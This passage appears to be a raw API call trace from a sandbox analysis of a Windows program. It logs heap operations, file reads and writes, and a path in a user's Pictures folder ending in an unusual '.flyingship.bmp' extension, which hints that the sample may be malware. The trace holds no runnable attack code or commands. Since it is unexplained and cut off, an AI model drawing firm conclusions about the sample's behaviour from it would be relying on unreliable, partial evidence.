lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.816] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0190.816] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.816] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0190.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0190.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0190.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0190.816] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0190.816] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x3050, lpOverlapped=0x0) returned 1 [0190.816] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0190.816] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x3050, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.816] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0190.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0190.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0190.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0190.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0190.817] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.flyingship.bmp\r\n", cchWideChar=94, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 94 [0190.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x5e) returned 0x9a5de0 [0190.817] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.flyingship.bmp\r\n", cchWideChar=94, lpMultiByteStr=0x9a5de0, cbMultiByte=94, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.flyingship.bmp\r\n", lpUsedDefaultChar=0x0) returned 94 [0190.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0190.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0190.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5de0 | out: hHeap=0x8a0000) returned 1 [0190.817] WriteFile (in: hFile=0x160, lpBuffer=0x9a5d10*, nNumberOfBytesToWrite=0x5d, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5d10*, lpNumberOfBytesWritten=0x87f43c*=0x5d, lpOverlapped=0x0) returned 1 [0190.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0190.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0190.817] CloseHandle (hObject=0x160) returned 1 [0190.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0190.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0190.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0190.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0190.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0190.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0190.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0190.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0190.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0190.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0190.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0190.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0190.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0190.819] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0190.819] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0190.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0190.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0190.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0190.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0190.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6e48 | out: hHeap=0x8a0000) returned 1 [0190.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0190.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0190.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0190.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0190.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0190.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0190.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0190.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0190.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0190.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0190.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0190.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0190.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0190.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0190.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0190.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0190.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0190.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0190.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0190.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0190.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0190.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0190.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0190.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0190.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0190.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0190.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0190.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0190.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0190.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0190.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0190.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0190.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0190.821] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0190.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0190.821] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0190.821] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0190.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0190.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0190.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0190.821] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0190.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0190.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0190.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0190.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b10 [0190.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0190.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0190.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0190.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0190.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0190.821] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0190.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0190.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba540 [0190.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0190.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0190.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0190.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0190.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0190.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0190.822] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0190.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0190.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0190.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0190.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0190.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0190.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0190.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0190.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0190.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0190.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0190.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0190.822] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0190.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0190.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0190.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0190.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0190.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0190.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0190.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0190.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0190.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0190.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0190.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0190.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0190.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0190.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0190.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0190.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0190.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0190.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0190.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0190.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0190.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0190.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0190.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0190.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0190.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0190.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0190.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0190.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0190.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0190.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0190.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0190.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0190.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0190.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0190.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0190.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0190.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0190.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0190.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0190.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0190.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0190.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0190.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0190.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0190.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0190.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0190.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0190.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0190.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0190.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0190.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0190.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0190.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0190.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0190.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0190.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0190.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0190.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0190.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0190.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0190.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0190.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0190.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0190.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0190.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0190.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0190.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0190.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0190.825] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0190.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0190.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0190.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0190.825] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0190.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0190.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0190.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0190.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0190.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0190.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0190.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0190.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0190.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0190.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0190.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0190.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0190.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0190.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0190.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0190.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0190.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0190.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0190.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0190.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0190.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0190.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0190.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0190.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0190.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0190.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0190.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0190.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0190.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0190.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0190.826] HeapFree (in: 